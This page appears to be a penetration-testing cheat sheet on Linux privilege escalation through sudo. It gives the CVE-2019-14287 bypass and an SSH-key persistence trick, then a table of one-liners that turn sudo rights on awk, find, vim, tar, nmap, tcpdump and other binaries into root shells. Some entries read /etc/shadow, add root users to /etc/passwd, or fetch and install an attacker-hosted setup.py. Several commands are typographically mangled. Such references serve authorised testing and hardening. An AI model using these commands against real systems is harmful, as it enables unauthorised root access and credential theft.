Navigation :

Abusing Sudo Rights

Resources

https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

https://gtfobins.github.io/

CVE 2019-14287

# Exploitable when a user have the following permissions (sudo -l)
(ALL, !root) ALL

# If you have a full TTY, you can exploit it like this
sudo -u#-1 /bin/bash

# If no TTY, you can restart SSH server and add your key
sudo /etc/init.d/ssh restart
echo 'ssh-rsa AAAA[...snip...]fd48as= root@kali-jms' > authorized_keys
sudo -u#-1 bash

Exploiting sudo

Binary program	Commands	Infos
apache2	sudo apache2 -f /etc/shadow	# You will get an error and it will # display first line
apt-get	sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
awk	sudo awk ‘BEGIN {system("/bin/sh")}’
ed	sudo /usr/bin/ed !/bin/sh
find	sudo find /etc/passwd -exec /bin/sh ; sudo find /bin -name nano -exec /bin/sh ;
ftp	sudo ftp ftp> /!/bin/bash
gdb	sudo -u user gdb -q (gdb) shell
git	# Method 1 sudo -u user git -c core.pager=/tmp/script.sh –paginate help # Method 2 sudo git help add !/bin/bash	# Method 1 Create script.sh and chmod 777 → /bin/bash >&2 0>&2 # Method 2 You can also use the help add feature
ht	export TERM=xterm-color sudo ht /etc/sudoers # F3 to open the file, then update lines ALL=(ALL) NOPASSWD: ALL
less	sudo less /etc/hosts !sh
man	sudo man man !sh
more	sudo more /etc/hosts !sh
mount	sudo mount -o bind /bin/bash /bin/mount sudo mount
mysql	sudo mysql -e ‘!/bin/sh’
nano	sudo nano /etc/passwd	# You can then add a new root user openssl passwd -1 -salt user3 pass123 # /etc/passwd user3::0:0:root:/root:/bin/bash
nmap	# Method 1 sudo nmap –interactive nmap> !sh # Method 2 echo “os.execute('/bin/sh')” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse	# Method 1 # Using –interactive option # Method 2 # Using –script option
pico	sudo -u user pico	# Type bash in editor an press ^T to # trigger spellchecker
pip	python -m SimpleHTTPServer 80 wget http://192.168.1.134/setup.py sudo pip install . –upgrade –force-reinstall	# You can use FakePip https://github.com/0x00-0x00/FakePip.git # Decode and change IP adress
rbash	echo $SHELL echo $PATH export SHELL=/bin/bash:$SHELL export PATH=/usr/bin:$PATH vi :!/bin/bash
rvim	rvim version	grep python echo “import os;os.system(‘bash’)” > /tmp/script.py sudo -u rvim -c “pyfile /tmp/script.py”
scp	sudo -u user scp -vv -C -S tmp/script.sh a whatever	# Create script.sh and chmod 777 → /bin/bash >&2 0>&2
script	sudo -u user script /tmp/what-ever
ssh	sudo -u user ssh -o ProxyCommand=/tmp/script.sh lel	# Create script.sh and chmod 777 → /bin/bash >&2 0>&2
strace / sysud64	sudo strace -o/dev/null /bin/bash sudo sysud64 -o/dev/null /bin/bash
tar	# Method 1 sudo -u user tar –checkpoint=1 –checkpoint-action=exec=/bin/bash -cf /tmp/12345.tar /dev/zero # Method 2 cd /tmpcp /bin/bash . sudo chown root:root /tmp/bash sudo mv /bin/tar /bin/tar.bak sudo mv /tmp/bash /bin/tar sudo /bin/tar
tcpdump	echo $’id\ncat /etc/shadow’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
teehee	echo “raaj::0:0:::/bin/bash”	sudo teehee -a /etc/passwd
vim	sudo vim -c ‘!sh’
wget	sudo wget http://ip/filePasswd -O /etc/passwd su user1	# Attacker side # Copy target’s file /etc/passwd # Add a new user and host the fil
zip	# Method 1 touch /tmp/xyz; chmod 444 /tmp/xyz sudo -u user zip /tmp/zzz.zip /tmp/xyz -T -TT /tmp/script.sh # Method 2 touch raj sudo zip /tmp/nisha.zip /home/zico/raj -T –unzip-command=“sh -c /bin/bash”	# Create script.sh and chmod 777 → /bin/bash >&2 0>&2